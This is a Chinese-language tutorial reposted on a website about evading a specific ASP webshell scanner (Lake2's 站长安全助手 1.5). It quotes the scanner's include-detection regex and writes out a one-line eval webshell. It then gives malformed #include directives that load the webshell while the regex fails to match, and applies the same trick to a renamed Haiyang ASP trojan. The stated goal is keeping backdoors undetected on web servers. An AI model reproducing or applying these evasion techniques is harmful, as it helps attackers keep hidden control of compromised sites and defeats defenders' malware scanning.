到Lake2網(wǎng)站上下了1.5的源代碼，發(fā)現(xiàn)這個(gè)版本的確改進(jìn)了不少，又增加了查殺功能:
1:查殺通過(guò)了Unicode編碼的ASP木馬
2:查殺使用了(Open|Create)TextFile， SaveToFile，Save， set Server，Server.(Transfer|Execute)， ShellExecute，Exec，Run方法的文件
3:改變?cè)瓉?lái)以FSO方法中OpenTextFile打開(kāi)文件的方式，現(xiàn)改為使用ADODB.Stream對(duì)方法中的open方式打開(kāi)
程序增加了這三個(gè)功能后，查殺木馬的能力大大增強(qiáng)，要突破過(guò)去，有難度!難怪不得，Lake2在其網(wǎng)站上稱幾乎能殺所有ASP木馬.今天我們就來(lái)看看如何突破它.
當(dāng)我這次讀站長(zhǎng)助手代碼的時(shí)，注意到了這樣一個(gè)問(wèn)題:這個(gè)ASP站長(zhǎng)安全助手使用了大量的正則表達(dá)式，對(duì)于正則表達(dá)式，我個(gè)人的看法是:如果匹配得好，要突破很不容易;但是若匹配得不好，我們就可以輕易的突破，一個(gè)再?gòu)?qiáng)大的系統(tǒng)也將變得不安全.在突破它之前，我們先看看正則表達(dá)式的基本語(yǔ)法.
* 匹配前面的子表達(dá)式零次或多次。例如，zo* 能匹配 "z" 以及 "zoo"。 * 等價(jià)于{0，}。
\s 匹配任何空白字符，包括空格、制表符、換頁(yè)符等等。等價(jià)于 [ \f\n\r\t\v]。
. 匹配除換行符 \n之外的任何單字符。要匹配 .，請(qǐng)使用 \。
若我們使用”\s”和”*”相結(jié)合為”\s*”，最終將匹配0個(gè)或多個(gè)空格，制表符，換頁(yè)符等.若我們使用”.”與”*”相結(jié)合為”.*”將匹配0個(gè)或多個(gè)除了換行符之外的字符.有了這些知識(shí)后，就讓我們來(lái)看看它的代碼.
在admin_scanwebshell.asp中，有如下代碼:
’Check include file with "
Set regEx = New RegExp //建立正則表達(dá)式對(duì)象
regEx.IgnoreCase = True //忽略大小寫
regEx.Global = True //設(shè)置為全局匹配
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*"" //模式
Set Matches = regEx.Execute(filetxt) //用正則表達(dá)式模式在字符串filetxt中運(yùn)行查找，并返回包含該查找結(jié)果的一個(gè)數(shù)組， 如果 exec 方法沒(méi)有找到匹配，則它返回 null
For Each Match in Matches
tFile = Replace(Mid(Match.Value， Instr(Match.Value， """)1， Len(Match.Value) - Instr(Match.Value， """) - 1)，"/"，"\") //進(jìn)行查找和替換工作
If Not CheckExt(FSOs.GetExtensionName(tFile)) Then //若是屬于被檢查的后綴名，則進(jìn)行下一步的查殺工作
Call ScanFile( Mid(FilePath，1，InStrRev(FilePath，"\"))&tFile， replace(FilePath，server.MapPath("\")&"\"，""，1，1，1) ) //調(diào)用文件進(jìn)行查殺
SumFiles = SumFiles1
End If
(注:在另一文件中使用幾乎相同的函數(shù)，只是把上面函數(shù)的雙引號(hào)換成了單引號(hào))
下面，我們一起來(lái)分析這個(gè)程序的執(zhí)行過(guò)程，在這里，假如我們使用了”<!--#include file="1.txt"-->”.程序按照設(shè)置好的正則表達(dá)式模式regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*""在filetxt中進(jìn)行查找， 并返回包含該查找結(jié)果的一個(gè)數(shù)組，因?yàn)槲覀兊淖址?<!--#include file="1.txt"-->和設(shè)置好的正則表達(dá)式模式相符，所以返回包含該查找結(jié)果的一個(gè)數(shù)組.然后再進(jìn)行查找和替換和查殺操作，要是我們能構(gòu)造一個(gè)字符串，讓它不符合這個(gè)模式，那么將返回NULL，也就不會(huì)殺我們的ASP馬，下面我們來(lái)實(shí)驗(yàn):
第一步:
1:新建一個(gè)文件ttfct.txt，其內(nèi)容為:<%eval request(“go”)%>.
2:新建一個(gè)文件nokill.asp，其內(nèi)容為<!--#include file=”ttfct.txt”-->
用雷客圖ASP站長(zhǎng)安全助手1.5進(jìn)行查. 用Lake2的一句客服端連接，顯示正常.
第二步:
修改nokill.asp，使其內(nèi)容為<!--#include file=”ttfct.t”ss”xt”-->，再次連接. 不知道大家注意到這一句沒(méi)有: Active Server Pages， ASP 0126 (0x80004005)，找不到包含文件 ’ttfct.t’。/ttfct/nokill.asp， 第 1 行
為什么我們這里只有ttfct.t，那xt難道被吃了不成?的確，xt就是被吃了，因?yàn)楸唤財(cái)嗔?那我們把xt補(bǔ)上，其內(nèi)容變?yōu)? <!--#include file=”ttfct.txt”ss”xt”-->，再次提交，結(jié)果成功，顯示效果和圖二相同.拿我們現(xiàn)在構(gòu)造的語(yǔ)句: <!--#include file=”ttfct.txt”ss”xt”-->和regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*""進(jìn)行匹配，大家發(fā)現(xiàn)沒(méi)有，我們的語(yǔ)句有4個(gè)引號(hào)，而此匹配的語(yǔ)句只有兩個(gè)引號(hào)，當(dāng)然匹配就不會(huì)成功了.下面查殺的結(jié)果證明了我的分析.
“Include file=”后面可以加字符串，那么，兩邊能加不，為此，我們改內(nèi)容為 "ttfct"<!--#include file="ttfct.txt"-->"同樣能成功連接并且突破雷客圖ASP站長(zhǎng)安全助手，我們?cè)贅?gòu)造: <!--#include file=ttfct.txt-->(注意:ttfct.txt兩邊沒(méi)有引號(hào))，這樣就都能成功的讓我們的一句話木馬長(zhǎng)久的活下去.
一句話木馬起始回生，用同樣的方法我們可以讓海洋ASP木馬躲過(guò)它的查殺，具體方法是，把海洋ASP木馬的后綴改為.dll，.hack等，隨便你，大家任意發(fā)揮，改成你的名字都可以:).
然后我們新建一個(gè)文件命名為hy.asp，將代碼<!--#include file="hy.dll”stssst"-->放進(jìn)去，通過(guò)訪問(wèn)hy.asp也就調(diào)用了海洋了.
總結(jié):除了對(duì)ASP語(yǔ)言了解之外，我們還要通過(guò)實(shí)踐，這樣，才得真正的走向成功的大門.
如果你對(duì)此免殺還有更好的方法，歡迎來(lái)和我交流，我的ID是TTFCT.

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。